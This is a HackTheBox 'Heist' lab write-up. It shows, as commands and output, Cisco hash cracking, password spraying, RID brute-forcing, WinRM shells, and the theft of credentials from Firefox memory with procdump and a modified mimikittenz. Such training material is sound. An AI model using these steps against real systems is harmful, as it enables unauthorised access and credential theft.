Heist brought new concepts I hadn’t seen on HTB before, yet keep to the easy difficulty. I’ll start by find a Cisco config on the website, which has some usernames and password hashes. After recovering the passwords, I’ll find that one works to get RPC access, which I’ll use to find more usernames. One of those usernames with one of the original passwords works to get a WinRM session on the Heist. From there, I’ll notice that Firefox is running, and dump the process memory to find the password for the original website, which is also the administrator password for the box.

Box Info

Name Heist Heist
Play on HackTheBox
Release Date 10 Aug 2019
Retire Date 30 Nov 2019
OS Windows Windows
Base Points Easy [20]
Rated Difficulty Rated difficulty for Heist
Radar Graph Radar chart for Heist
First Blood User 00 days, 00 hours, 38 mins, 54 seconds InfoSecJack
First Blood Root 00 days, 01 hours, 38 mins, 41 seconds snowscan
Creator MinatoTW



nmap shows a handful of Windows ports, HTTP (TCP 80), RPC (TCP 135, 49669), SMB (TCP 445), and WinRM (TCP 5985):

root@kali# nmap -p- --min-rate 10000 -oA scans/nmap-alltcp
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 19:10 EDT
Nmap scan report for
Host is up (0.42s latency).
Not shown: 65530 filtered ports
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 21.59 seconds
root@kali# nmap -sC -sV -p 80,135,445,5985,49669 -oA scans/nmap-tcpscripts
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 19:11 EDT
Nmap scan report for
Host is up (0.20s latency).

80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-20 19:12:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.83 seconds

Based on the IIS Version, it looks like Windows 10 / Server 2016 / Server 2019.

Website - TCP 80

The site offers a login page:


I don’t have creds, but there’s a “Login as guest” link. I’ll click it, and I’m taken to an issues page:


A user named hazard is seeking help about this Cisco router. I can view the config by clicking on the “Attachment” link:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 networkÂ mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Cracking Passwords


In the Cisco config, there are 3 different hashes of two different types, each of which are described in this paper:

HashHash Type
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91Cisco Type 5
salted md5
username rout3r password 7 0242114B0E143F015F5D1E161713Cisco Type 7
Custom, reversible
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Type 5

The type 5 password can be decrypted with john:

root@kali# /opt/john/run/john --wordlist=/usr/share/wordlists/rockyou.txt level5_hash                                                                                                      
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:00:15 DONE (2019-08-20 19:54) 0.06631g/s 232443p/s 232443c/s 232443C/s steaua17..steall3
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I’ll start a list of passwords, and add “stealth1agent” to it.

Type 7

There are online tools to crack type 7 hashes, but it’s more interesting to understand what’s going on. The paper I mentioned above goes into detail as to how the Type 7 scheme works. Basically, string in the config is hex characters. The first two characters is the offset into the static key to start at (indexed starting at one, eww). The rest are the hex bytes that when xored by successive characters from the password, produce the plaintext password. The static encryption key is “tfd;kfoA,.iyewrkldJKD”.

So if I start with “0242114B0E143F015F5D1E161713”, I know the password is 13 characters long. I also know that the first byte is 2, so start at the second letter in the key, f. Then xor it with the next hex byte, 42 to get $:

root@kali# python3
Python 3.7.3 (default, Apr  3 2019, 05:39:12)
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> chr(ord('f') ^ int('42',16))

I wrote a quick python script to decrypt it (and there are tons available on the internet):

#!/usr/bin/env python3

import sys
from binascii import unhexlify

if len(sys.argv) != 2:
    print(f"Usage: {sys.argv[0]} [level 7 hash]")

static_key = "tfd;kfoA,.iyewrkldJKD"
enc = sys.argv[1]
start = int(enc[:2], 16) - 1
enc = unhexlify(enc[2:])
key = static_key[start:] + static_key[:start]

plain = ''.join([chr(x ^ ord(key[i % len(key)]))  for i, x in enumerate(enc)])

I can get the two from the config:

root@kali# ./cisco_de7.py 0242114B0E143F015F5D1E161713
root@kali# ./cisco_de7.py 02375012182C1A1D751618034F36415408

Two more passwords. I’ve got a list of three passwords, and a list of three user names:

root@kali# cat passwords 
root@kali# cat users 

SMB - TCP 445

Initial Enum

I start with the typical smbmap call:

root@kali# smbmap -H
[+] Finding open SMB ports....
[!] Authentication error occurred
[!] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Authentication error on

No permissions. I try adding a bad username and password just to be sure, but same results. I’ll also check smbclient just in case:

root@kali# smbclient -N -L //
session setup failed: NT_STATUS_ACCESS_DENIED

With Creds

Now I’ll try with the credentials I’ve gathered. CrackMapExec is a great tool here. I can give it a list of username and passwords, and let it tell me which one worked:

root@kali# crackmapexec smb -u users -p passwords 
CME SUPPORTDESK     [*] Windows 10.0 Build 17763 (name:SUPPORTDESK) (domain:SUPPORTDESK)
CME SUPPORTDESK     [+] SUPPORTDESK\hazard:stealth1agent 

It will stop once it finds one. If you want it to continue, there’s a --continue-on-success flag in newer versions than the one on kali.

I’ll re-run smbmap with creds. hazard can only access IPC$:

root@kali# smbmap -H -u hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on
[+] IP:        Name:                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY

I would go back and re-run crackmapexec, but I already saw all three passwords fail with the two other users. I’ll also try to connect over WinRM with these creds, but it fails.


IPC$ is a share used for interprocess communications. Typically IPC$ is known for accecpting null (unauthenticated) sessions, but in this case, I needed credentials to read from it.

As I can read IPC$, I can connect with rpcclient:

root@kali# rpcclient -U 'hazard%stealth1agent'
rpcclient $> 

I can use the lookupnames command to get the SIDs of the users I know:

rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)
rpcclient $> lookupnames rout3r
rpcclient $> lookupnames admin

I can also look up accounts by SID:

rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

I’ll brute force across a bunch of SIDs in a loop to get a list of all users. If I run rpcclient with a -c, I can offer a command from the command line:

root@kali# rpcclient -U 'hazard%stealth1agent' -c 'lookupsids S-1-5-21-4254423774-1266059056-3197185112-1000'
S-1-5-21-4254423774-1266059056-3197185112-1000 *unknown*\*unknown* (8)

I’ll start at 1000 and work up to 1050, using grep to remove the unknowns:

root@kali# for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)

There’s also an impacket tool, lookupsids.py, which does this faster and cleaner:

root@kali# lookupsid.py hazard:stealth1agent@
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Shell as chase


When I originally solved Heist, I took these new user names and my list of passwords, and I used Evil-WinRM to try connecting as each with different passwords. When I got to chase / ‘Q4)sJu\Y8qz*A3?d’, it connected:

root@kali# ruby /opt/evil-winrm/evil-winrm.rb -i -u SUPPORTDESK\\chase -s ~/pshs/ -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

Note, with evil-winrm, I give it a scripts directory and an exes directory.

And I can grab user.txt:

*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt

Script It

That was a fair amount of guessing, and I am much happier if I can script something, even if just in a console, to do the brute force for me. Because getting better at PowerShell is on my to-do list, I decided to try that.

I’ll start a PowerShell docker container, using -v to mount my current directory with my passwords list into /opt:

root@kali# docker run -v $(pwd):/opt/heist -it quickbreach/powershell-ntlm
PowerShell 6.1.1
Copyright (c) Microsoft Corporation. All rights reserved.

Type 'help' to get help.

PS />

Now, I’ll write a loop to try each of the passwords I’ve collected with WinRM with the new user, Chase:

PS /opt/heist> foreach($pass in cat ./passwords) {  
>>     $user = "chase"
>>     $secstr = New-Object -TypeName System.Security.SecureString
>>     $pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
>>     $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
>>     $res = New-PSSession -ComputerName -Authentication Negotiate -Credential $cred -ErrorAction SilentlyContinue
>>     if($res -ne $null) {
>>         echo "[+] Found password: $pass"
>>         Enter-PSSession $res
>>     } else {
>>         echo "[-] Password failed: $pass"
>>     }
>> }
[-] Password failed: stealth1agent
[-] Password failed: $uperP@ssword
[+] Found password: Q4)sJu\Y8qz*A3?d
[]: PS C:\Users\Chase\Documents> whoami

The first line just loops over the lines in my password file. The next four lines set up the Windows credential object. The fifth line tries to create a PSSession using the credential. Then there’s a branch. If success, print message and connect. Otherwise, alert to failure, and continue.

Priv to administrator



Looking around on the box, there’s not a ton of stuff I can access. But if I go back to the source code for \inetpub\wwwroot\login.php, I see it’s a hardcoded administrator password:

if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {                                                      
        if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
                $_SESSION['admin'] = "valid";
                header('Location: issues.php');                           
                header('Location: errorpage.php');
else if( isset($_GET['guest']) ) {                                                                                    
        if( $_GET['guest'] === 'true' ) {
                $_SESSION['guest'] = "valid";
                header('Location: issues.php');                                            


The password hash is a SHA256. john runs all of rockyou in a second, but doesn’t find a match:

root@kali# /opt/john/run/john --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt sha256_admin_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=3
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2019-08-23 02:52) 0g/s 9078Kp/s 9078Kc/s 9078KC/s $$m4hid$$..*7¡Vamos!
Session completed

Request Format

While I’m here, I’ll check out what a POST request to login to the page looks like. I’ll make sure I’m running through burp, and login with dummy creds:

POST /login.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Cookie: PHPSESSID=v3bm1dd6r11s1f7dcu7j4p6h4g
Connection: close
Upgrade-Insecure-Requests: 1



I also checked out files in chase’s home directory. I typically start by excluding appdata from the search:

*Evil-WinRM* PS C:\> cmd /c dir /s /b /a:-d-h \Users\chase | findstr /i /v appdata

todo.txt is interesting:

*Evil-WinRM* PS C:\> type \Users\chase\Desktop\todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

1. Restricted access for guest user.

There’s three items here. The first implies that chase will keep checking the website to watch the issues list. The third implies that the guest user doesn’t have the access that some other use will have (I saw about that user is admin@support.htb). The second is likely the issue that came from the support ticket I saw earlier.

How would chase check the issues list? With a browser. I’ll also notice that multiple instances of firefox are in the process list:

*Evil-WinRM* PS C:\> get-process firefox
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    358      26    16332     279920       0.73   6252   1 firefox
   1138      71   141448     476008      42.98   6440   1 firefox
    341      19    10176     264104       0.80   6564   1 firefox
    407      31    17392     293212       3.86   6796   1 firefox
    390      36    78456     341504      67.70   7104   1 firefox   

I also see a profile in chase’s appdata directory:

*Evil-WinRM* PS C:\users\chase\appdata\roaming\Mozilla\Firefox\Profiles> ls

    Directory: C:\users\chase\appdata\roaming\Mozilla\Firefox\Profiles

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----        8/23/2019  12:38 PM                77nc64t5.default

Get Creds from Firefox

I’ll show a few different ways to do this.

procdump / Out-Minidump

I’ll grab procdump64.exe from the sysinternals tools page, and upload it to Heist:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload ~/exes/procdump64.exe .
Info: Uploading ~/exes/procdump64.exe to .

Data: 455560 bytes of 455560 bytes copied

Info: Upload successful!

Now I’ll run it on one of the pids for firefox from above:

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64 -ma 6252 -accepteula

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:54:30] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_190823_025430.dmp
[02:54:30] Dump 1 writing: Estimated dump file size is 280 MB.
[02:54:32] Dump 1 complete: 281 MB written in 2.1 seconds
[02:54:33] Dump count reached.

Alternatively, I could create the same dump using PowerSploit’s Out-Minidump:

*Evil-WinRM* PS C:\users\chase\appdata\local\temp> Out-Minidump.ps1
*Evil-WinRM* PS C:\users\chase\appdata\local\temp> menu

   ___ __ __  ____  _
  /  _]  |  ||    || |
 /  [_|  |  | |  | | |
|    _]  |  | |  | | |___
|   [_|  :  | |  | |     |
|     |\   /  |  | |     |
|_____| \_/  |____||_____|

 __    __  ____  ____   ____   ___ ___
|  |__|  ||    ||    \ |    \ |   |   |
|  |  |  | |  | |  _  ||  D  )| _   _ |
|  |  |  | |  | |  |  ||    / |  \_/  |
|  `  '  | |  | |  |  ||    \ |   |   |
 \      /  |  | |  |  ||  .  \|   |   |
  \_/\_/  |____||__|__||__|\_||___|___|

                           By: CyberVaca@HackPlayers

[+] Invoke-Binary
[+] l04d3r-LoadDll
[+] Out-Minidump

*Evil-WinRM* PS C:\users\chase\appdata\local\temp> get-process -id 6252 | Out-Minidump

    Directory: C:\users\chase\appdata\local\temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/23/2019  11:09 PM      286666409 firefox_6252.dmp

Now I’ll download the dump:

*Evil-WinRM* PS C:\Users\Chase\Documents> download firefox.exe_190823_025430.dmp
Info: Downloading firefox.exe_190823_025430.dmp to firefox.exe_190823_025430.dmp

Info: Download successful!

Now I’ll look for any POST requests in memory using grep and the format I found above:

root@kali# grep -aoE 'login_username=.{1,20}@.{1,20}&login_password=.{1,50}&login=' firefox.exe_190823_025430.dmp 

The options on grep are:

  • -a - Process a binary file as if it were text.
  • -o - Print only the matched (non-empty) parts of a matching line
  • -E - Interpret PATTERNS as extended regular expressions

I’ll use a regex where I look for a basic email address as the login_username, and a 1-50 character password.

I’ve got a password there. I can check, and it does match the hash from the source code:

root@kali# echo -n '4dD!5}x/re8]FBuZ' | sha256sum 
91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040  -


Mimikittenz is a tool that will look into the memory of user space processes and look for passwords. By default, it checks IE, Chrome, and Firefox for POST requests that match common webmail, social media, and other sites. I can drop it in the scripts directory for my evil-winrm connection, then read it into my session, and run it. But it won’t find anything:

root@kali# ruby /opt/evil-winrm/evil-winrm.rb -i -u SUPPORTDESK\\chase -s ~/pshs/ -p 'Q4)sJu\Y8qz*A3?d'                                                                                                                           

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-mimikittenz.ps1
*Evil-WinRM* PS C:\Users\Chase\Documents> menu

   ___ __ __  ____  _
  /  _]  |  ||    || |
 /  [_|  |  | |  | | |
|    _]  |  | |  | | |___
|   [_|  :  | |  | |     |
|     |\   /  |  | |     |
|_____| \_/  |____||_____|

 __    __  ____  ____   ____   ___ ___
|  |__|  ||    ||    \ |    \ |   |   |
|  |  |  | |  | |  _  ||  D  )| _   _ |
|  |  |  | |  | |  |  ||    / |  \_/  |
|  `  '  | |  | |  |  ||    \ |   |   |
 \      /  |  | |  |  ||  .  \|   |   |
  \_/\_/  |____||__|__||__|\_||___|___|

                           By: CyberVaca@HackPlayers

[+] Invoke-Binary
[+] Invoke-mimikittenz
[+] l04d3r-LoadDll

*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-mimikittenz
▐▒▒▒▒▒▒CAN I HAZ WAM?▒▒▒▒▒▒▒▒▒▒▒▒▌────
*Evil-WinRM* PS C:\Users\Chase\Documents>

That’s because I want to catch chase logging into Heist, not Gmail or GitHub or any well known site. I’ll create a copy of the ps1 file, and scroll to the bottom. I’ll add a regex based on the Heist POST request:

    # HTB-Heist

Also, I’ll edit the line towards the end to tell it to just look at firefox, removing IE and Chrome:


Now, I’ll upload that to a new session of evil-winrm, and run it:

root@kali# ruby /opt/evil-winrm/evil-winrm.rb -i -u SUPPORTDESK\\chase -s ~/pshs/ -p 'Q4)sJu\Y8qz*A3?d'                                                            

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-mimikittenz-heist.ps1
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-mimikittenz
▐▒▒▒▒▒▒CAN I HAZ WAM?▒▒▒▒▒▒▒▒▒▒▒▒▌────

PatternName PatternMatch
----------- ------------
Heist       login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

I get the password!

Find in Session Data

Rather than dumping memory, I can look in the user’s session data. I’ll start by finding the Firefox profile. In this case, there’s only one:

[]: PS C:\Users\Chase\appdata\roaming\mozilla\firefox\profiles> dir

    Directory: C:\Users\Chase\appdata\roaming\mozilla\firefox\profiles

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/26/2019  11:35 PM                77nc64t5.default 

In the profile folder, there’s a folder named sessionstore-backups. Sometimes after a while there will be session data backed up in this folder. On a reset, it’s empty. When there is session data, I can find it with:

[]: PS C:\Users\Chase\appdata\roaming\mozilla\firefox\profiles\77nc64t5.default\sessionstore-backups> Get-ChildItem -path . -recurse -file | select-string password

Shell as administrator

The password for the site is reused as the administrator password for the box, so I can just connect with evil-winrm:

root@kali# ruby /opt/evil-winrm/evil-winrm.rb -i -u SUPPORTDESK\\administrator -s . -e . -p '4dD!5}x/re8]FBuZ'                                                                

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

And get root.txt:

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt